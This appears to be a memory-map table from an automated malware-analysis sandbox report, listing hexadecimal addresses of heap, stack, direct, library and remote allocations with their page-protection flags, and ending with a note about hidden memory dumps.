|
page read and write
|
||
|
24A60000
|
direct allocation
|
page read and write
|
||
|
25268000
|
direct allocation
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
255F0000
|
direct allocation
|
page read and write
|
||
|
27FA000
|
heap
|
page read and write
|
||
|
251FC000
|
direct allocation
|
page read and write
|
||
|
809C000
|
trusted library allocation
|
page read and write
|
||
|
99F0000
|
heap
|
page readonly
|
||
|
BDAD000
|
direct allocation
|
page execute and read and write
|
||
|
251C0000
|
direct allocation
|
page read and write
|
||
|
251B0000
|
direct allocation
|
page read and write
|
||
|
8B80000
|
heap
|
page read and write
|
||
|
4B5F000
|
heap
|
page read and write
|
||
|
8940000
|
trusted library allocation
|
page read and write
|
||
|
8C50000
|
trusted library allocation
|
page execute and read and write
|
||
|
86BE000
|
stack
|
page read and write
|
||
|
C7AD000
|
direct allocation
|
page execute and read and write
|
||
|
9A50000
|
heap
|
page read and write
|
||
|
9D50000
|
direct allocation
|
page execute and read and write
|
||
|
5FDD000
|
remote allocation
|
page execute and read and write
|
||
|
4E06000
|
trusted library allocation
|
page read and write
|
||
|
9A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
69DD000
|
remote allocation
|
page execute and read and write
|
||
|
7C5E000
|
stack
|
page read and write
|
||
|
9A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
5DA5000
|
trusted library allocation
|
page read and write
|
||
|
253D4000
|
direct allocation
|
page read and write
|
||
|
25700000
|
direct allocation
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
2284000
|
heap
|
page read and write
|
||
|
41DD000
|
remote allocation
|
page execute and read and write
|
||
|
254F4000
|
direct allocation
|
page read and write
|
||
|
984E000
|
stack
|
page read and write
|
||
|
24F6F000
|
stack
|
page read and write
|
||
|
9955000
|
heap
|
page read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
9AE6000
|
heap
|
page read and write
|
||
|
4A10000
|
trusted library allocation
|
page read and write
|
||
|
8190000
|
trusted library allocation
|
page read and write
|
||
|
251E0000
|
direct allocation
|
page read and write
|
||
|
8180000
|
trusted library allocation
|
page read and write
|
||
|
7FF000
|
stack
|
page read and write
|
||
|
6EF0000
|
heap
|
page execute and read and write
|
||
|
98A0000
|
trusted library allocation
|
page read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
9ACC000
|
stack
|
page read and write
|
||
|
9CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8810000
|
trusted library allocation
|
page read and write
|
||
|
4A57000
|
heap
|
page read and write
|
||
|
2EB0000
|
direct allocation
|
page read and write
|
||
|
9AE3000
|
heap
|
page read and write
|
||
|
7BE000
|
stack
|
page read and write
|
||
|
81E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
8D10000
|
trusted library allocation
|
page read and write
|
||
|
9A00000
|
direct allocation
|
page read and write
|
||
|
2E80000
|
direct allocation
|
page read and write
|
||
|
27F1000
|
heap
|
page read and write
|
||
|
49F0000
|
trusted library allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
4A50000
|
heap
|
page read and write
|
||
|
9B43000
|
heap
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
27EF000
|
stack
|
page read and write
|
||
|
252B0000
|
direct allocation
|
page read and write
|
||
|
9D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
24E2E000
|
stack
|
page read and write
|
||
|
86C1000
|
trusted library allocation
|
page read and write
|
||
|
84D000
|
heap
|
page read and write
|
||
|
30A4000
|
heap
|
page read and write
|
||
|
262D8000
|
direct allocation
|
page read and write
|
||
|
8640000
|
trusted library allocation
|
page execute and read and write
|
||
|
251D0000
|
direct allocation
|
page read and write
|
||
|
7C5000
|
heap
|
page read and write
|
||
|
251D4000
|
direct allocation
|
page read and write
|
||
|
49C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8635000
|
trusted library allocation
|
page read and write
|
||
|
251DC000
|
direct allocation
|
page read and write
|
||
|
7B66000
|
trusted library allocation
|
page read and write
|
||
|
8A30000
|
trusted library allocation
|
page read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
25758000
|
direct allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
25120000
|
remote allocation
|
page read and write
|
||
|
26971000
|
heap
|
page read and write
|
||
|
2B8E000
|
stack
|
page read and write
|
||
|
8A81000
|
heap
|
page read and write
|
||
|
8110000
|
trusted library allocation
|
page read and write
|
||
|
2FEF000
|
stack
|
page read and write
|
||
|
89A0000
|
trusted library allocation
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
27F3000
|
heap
|
page read and write
|
||
|
30DA000
|
heap
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
4EF6000
|
trusted library allocation
|
page read and write
|
||
|
25600000
|
direct allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
2537C000
|
direct allocation
|
page read and write
|
||
|
998C000
|
stack
|
page read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
87BE000
|
stack
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
4890000
|
heap
|
page execute and read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
992B000
|
stack
|
page read and write
|
||
|
3097000
|
heap
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
8950000
|
trusted library allocation
|
page read and write
|
||
|
8CD0000
|
trusted library allocation
|
page read and write
|
||
|
9A10000
|
trusted library allocation
|
page read and write
|
||
|
256C0000
|
direct allocation
|
page read and write
|
||
|
252B0000
|
direct allocation
|
page read and write
|
||
|
251F0000
|
direct allocation
|
page read and write
|
||
|
27FC000
|
heap
|
page read and write
|
||
|
9860000
|
trusted library allocation
|
page read and write
|
||
|
873E000
|
stack
|
page read and write
|
||
|
B0E000
|
stack
|
page read and write
|
||
|
2501F000
|
stack
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
77D000
|
stack
|
page read and write
|
||
|
2F89000
|
trusted library allocation
|
page read and write
|
||
|
73C1000
|
heap
|
page read and write
|
||
|
2F9A000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BDD000
|
remote allocation
|
page execute and read and write
|
||
|
9CC0000
|
trusted library allocation
|
page read and write
|
||
|
2519F000
|
stack
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
9A60000
|
direct allocation
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
7C9E000
|
stack
|
page read and write
|
||
|
87DD000
|
remote allocation
|
page execute and read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
25638000
|
direct allocation
|
page read and write
|
||
|
7B76000
|
trusted library allocation
|
page read and write
|
||
|
8CAC000
|
stack
|
page read and write
|
||
|
8D90000
|
trusted library allocation
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
73B0000
|
heap
|
page read and write
|
||
|
3017000
|
heap
|
page read and write
|
||
|
24A20000
|
direct allocation
|
page read and write
|
||
|
24E6F000
|
stack
|
page read and write
|
||
|
2F74000
|
trusted library allocation
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
8A40000
|
heap
|
page read and write
|
||
|
AFD000
|
stack
|
page read and write
|
||
|
86F0000
|
trusted library allocation
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
8A00000
|
trusted library allocation
|
page read and write
|
||
|
2F46000
|
heap
|
page read and write
|
||
|
255D8000
|
direct allocation
|
page read and write
|
||
|
5DC9000
|
trusted library allocation
|
page read and write
|
||
|
880B000
|
trusted library allocation
|
page read and write
|
||
|
2A9C000
|
stack
|
page read and write
|
||
|
251C4000
|
direct allocation
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page read and write
|
||
|
433000
|
unkown
|
page readonly
|
||
|
9957000
|
heap
|
page read and write
|
||
|
7357000
|
heap
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
9876000
|
trusted library allocation
|
page read and write
|
||
|
73DD000
|
remote allocation
|
page execute and read and write
|
||
|
9ADD000
|
heap
|
page read and write
|
||
|
9AE6000
|
heap
|
page read and write
|
||
|
252B0000
|
direct allocation
|
page read and write
|
||
|
303F000
|
heap
|
page read and write
|
||
|
27F5000
|
heap
|
page read and write
|
||
|
2EEF000
|
unkown
|
page read and write
|
||
|
8080000
|
trusted library allocation
|
page read and write
|
||
|
251BC000
|
direct allocation
|
page read and write
|
||
|
8D80000
|
trusted library allocation
|
page read and write
|
||
|
24EED000
|
stack
|
page read and write
|
||
|
9D10000
|
heap
|
page read and write
|
||
|
DBAD000
|
direct allocation
|
page execute and read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
8980000
|
trusted library allocation
|
page execute and read and write
|
||
|
9A80000
|
trusted library allocation
|
page read and write
|
||
|
6DE6000
|
trusted library allocation
|
page read and write
|
||
|
25020000
|
heap
|
page read and write
|
||
|
88E0000
|
trusted library allocation
|
page read and write
|
||
|
98D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C43000
|
heap
|
page read and write
|
||
|
89B0000
|
heap
|
page read and write
|
||
|
89C0000
|
trusted library allocation
|
page read and write
|
||
|
9AE0000
|
heap
|
page read and write
|
||
|
30FF000
|
stack
|
page read and write
|
||
|
9AE6000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
9AF0000
|
trusted library allocation
|
page read and write
|
||
|
7CA0000
|
heap
|
page read and write
|
||
|
253F0000
|
direct allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
49D0000
|
trusted library allocation
|
page read and write
|
||
|
9D00000
|
trusted library allocation
|
page read and write
|
||
|
25348000
|
direct allocation
|
page read and write
|
||
|
2280000
|
heap
|
page read and write
|
||
|
808F000
|
trusted library allocation
|
page read and write
|
||
|
87FC000
|
stack
|
page read and write
|
||
|
7AE000
|
stack
|
page read and write
|
||
|
2515E000
|
stack
|
page read and write
|
||
|
58E000
|
stack
|
page read and write
|
||
|
251C8000
|
direct allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
25260000
|
direct allocation
|
page read and write
|
||
|
8740000
|
trusted library allocation
|
page read and write
|
||
|
7B6D000
|
trusted library allocation
|
page read and write
|
||
|
2E38000
|
heap
|
page read and write
|
||
|
9A40000
|
trusted library allocation
|
page read and write
|
||
|
25228000
|
direct allocation
|
page read and write
|
||
|
9AE0000
|
heap
|
page read and write
|
||
|
9B21000
|
heap
|
page read and write
|
||
|
84D000
|
heap
|
page read and write
|
||
|
84D000
|
heap
|
page read and write
|
||
|
2EA0000
|
direct allocation
|
page read and write
|
||
|
8D40000
|
trusted library allocation
|
page read and write
|
||
|
9BBC000
|
stack
|
page read and write
|
||
|
262C8000
|
direct allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
89D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9AD0000
|
heap
|
page read and write
|
||
|
9A20000
|
trusted library allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
9A30000
|
direct allocation
|
page read and write
|
||
|
8098000
|
trusted library allocation
|
page read and write
|
||
|
A0F000
|
stack
|
page read and write
|
||
|
7306000
|
heap
|
page read and write
|
||
|
9787000
|
stack
|
page read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
252B0000
|
direct allocation
|
page read and write
|
||
|
262C8000
|
direct allocation
|
page read and write
|
||
|
7CE2000
|
heap
|
page read and write
|
||
|
251C4000
|
direct allocation
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
84D000
|
heap
|
page read and write
|
||
|
F9AD000
|
direct allocation
|
page execute and read and write
|
||
|
4A09000
|
heap
|
page read and write
|
||
|
80A0000
|
trusted library allocation
|
page read and write
|
||
|
72F000
|
stack
|
page read and write
|
||
|
B7E000
|
stack
|
page read and write
|
||
|
74C000
|
stack
|
page read and write
|
There are 538 hidden memdumps, click here to show them.